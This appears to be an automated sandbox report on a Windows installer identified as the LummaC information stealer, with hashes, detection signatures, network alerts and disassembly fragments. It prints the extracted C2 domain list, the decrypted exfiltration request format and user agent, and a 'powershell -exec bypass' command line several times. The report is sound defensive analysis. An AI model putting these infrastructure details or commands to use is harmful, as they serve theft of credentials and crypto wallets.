Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Full_Ver_Setup.exe

Overview

General Information

Sample name:Full_Ver_Setup.exe
Analysis ID:1579540
MD5:5258ca149eea36d761a7e5649cb93855
SHA1:6b6c7a347389758d8edfb8582a730871c6786c06
SHA256:d92ea1ef0c0f2c1b6fe016fc25473bb6ce625d9a2c5134c62806aeb07c5033af
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation Via Stdin
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Full_Ver_Setup.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\Full_Ver_Setup.exe" MD5: 5258CA149EEA36D761A7E5649CB93855)
    • powershell.exe (PID: 3064 cmdline: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f638f1188e30f7d</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- /#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html> MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["crosshuaht.lat", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat", "sustainskelet.lat", "energyaffai.lat", "fannleadyn.click", "rapeflowwj.lat", "discokeyus.lat"], "Build id": "hRjzG3--ZINA"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x4b173:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        Process Memory Space: Full_Ver_Setup.exe PID: 6476JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: Full_Ver_Setup.exe PID: 6476JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Full_Ver_Setup.exe PID: 6476JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries

              System Summary

              barindex
              Source: Process startedAuthor: Nikita Nazarov, oscd.community: Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-22T23:30:19.760409+010020283713Unknown Traffic192.168.2.449730104.21.63.229443TCP
              2024-12-22T23:30:21.715303+010020283713Unknown Traffic192.168.2.449731104.21.63.229443TCP
              2024-12-22T23:30:24.417773+010020283713Unknown Traffic192.168.2.449733104.21.63.229443TCP
              2024-12-22T23:30:26.738257+010020283713Unknown Traffic192.168.2.449736104.21.63.229443TCP
              2024-12-22T23:30:28.931974+010020283713Unknown Traffic192.168.2.449739104.21.63.229443TCP
              2024-12-22T23:30:31.637679+010020283713Unknown Traffic192.168.2.449741104.21.63.229443TCP
              2024-12-22T23:30:33.777838+010020283713Unknown Traffic192.168.2.449742104.21.63.229443TCP
              2024-12-22T23:30:36.554754+010020283713Unknown Traffic192.168.2.449743104.21.63.229443TCP
              2024-12-22T23:30:40.219207+010020283713Unknown Traffic192.168.2.449744104.21.63.229443TCP
              2024-12-22T23:30:45.969482+010020283713Unknown Traffic192.168.2.449745194.58.112.174443TCP
              2024-12-22T23:30:52.133737+010020283713Unknown Traffic192.168.2.449748104.21.84.113443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-22T23:30:20.486574+010020546531A Network Trojan was detected192.168.2.449730104.21.63.229443TCP
              2024-12-22T23:30:22.496928+010020546531A Network Trojan was detected192.168.2.449731104.21.63.229443TCP
              2024-12-22T23:30:41.011639+010020546531A Network Trojan was detected192.168.2.449744104.21.63.229443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-22T23:30:20.486574+010020498361A Network Trojan was detected192.168.2.449730104.21.63.229443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-22T23:30:22.496928+010020498121A Network Trojan was detected192.168.2.449731104.21.63.229443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-22T23:30:34.556675+010020480941Malware Command and Control Activity Detected192.168.2.449742104.21.63.229443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Full_Ver_Setup.exe.6476.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat", "sustainskelet.lat", "energyaffai.lat", "fannleadyn.click", "rapeflowwj.lat", "discokeyus.lat"], "Build id": "hRjzG3--ZINA"}
              Source: Full_Ver_Setup.exeVirustotal: Detection: 12%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.4% probability
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: fannleadyn.click
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--ZINA
              Source: Full_Ver_Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_0321E346
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-466F3075h]0_2_03227227
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov esi, eax0_2_0322C19F
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0322C19F
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov edx, ecx0_2_0323D2F7
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov esi, edx0_2_032262FD
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx esi, byte ptr [eax]0_2_0322B2C6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov byte ptr [edx], al0_2_03227125
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then jmp dword ptr [004436A4h]0_2_03217136
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-4B2E9D9Fh]0_2_0322A13C
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h0_2_0323B116
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h0_2_0323B116
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov edx, ecx0_2_0323B116
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ecx, eax0_2_0323F146
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov esi, eax0_2_0322C1A4
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0322C1A4
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ecx, eax0_2_0320C046
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh0_2_0321A056
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ebx, eax0_2_032070F6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ebp, eax0_2_032070F6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx edx, byte ptr [eax]0_2_0322872B
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx ebp, byte ptr [esp+esi-14h]0_2_032377B6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0322B629
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then add ecx, FFFFFFFEh0_2_03238636
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000ABh]0_2_03216660
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-7B590292h]0_2_032216A5
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then jmp ecx0_2_032286DA
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0322A566
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then call dword ptr [00440DA8h]0_2_0320E43C
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 12BAC918h0_2_032194C9
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+0Ch]0_2_03209B26
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_03216B32
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0322DB64
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 2DA07A80h0_2_0323EB76
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx ebx, bx0_2_03225BB6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_03234A26
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edi+5602E8D9h]0_2_0320DA04
